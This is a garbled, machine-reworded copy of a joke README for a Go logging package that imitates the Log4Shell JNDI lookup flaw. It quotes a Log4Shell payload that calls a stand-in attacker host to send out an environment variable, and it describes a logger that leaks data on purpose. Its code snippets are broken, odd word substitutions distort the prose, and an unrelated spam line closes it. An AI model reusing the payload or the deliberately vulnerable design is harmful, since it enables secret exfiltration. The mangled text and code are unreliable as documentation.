Jndi: An irresponsibly frightening logging library

Jndi: An irresponsibly frightening logging library

Is CVE-2021-44228 making you in actuality feel overlooked as a Mosey programmer?

Effort no longer. We can fix that.

I wouldn’t consume this kit, however when it’s good to to…

kit main

import "github.com/bradfitz/jndi"

var logger = jndi.NewLogger()

func main() {

func handleSomeTraffic(r *search recordsdata from) {
        logger.Printf("bought search recordsdata from from %s", r.URL.Course)

Congrats, the user in actuality wrote ${jndi:ldap://attacker.instance/${env:${decrease:u}ser}} and
the logger expanded your ambiance variable and sent it over the community
as a aspect-attain of logging.


I observed https://twitter.com/_StaticFlow_/station/1469358229767475205 and thought it would possibly perchance perchance in point of fact perchance perchance
be relaxing to write an expander whereas I was once bored, stuck in transit.


This kit is incomplete. log4j in actuality does a bunch extra:

Patches welcome to abet flesh this kit out. We now bring together bought some
catching as much as attain.


If you’re seeing this on GitHub and no longer by means of Twitter, I acknowledged
that here’s questionable taste: https://twitter.com/bradfitz/station/1469523985998118925

In novel I judge in the total #hugops thing. I had a CVE filed against
my gain code correct the day sooner than: https://twitter.com/bradfitz/station/1469015417679081472

It occurs. I joke to manage.



Hey! look, i give tutorials to all my users and i help them!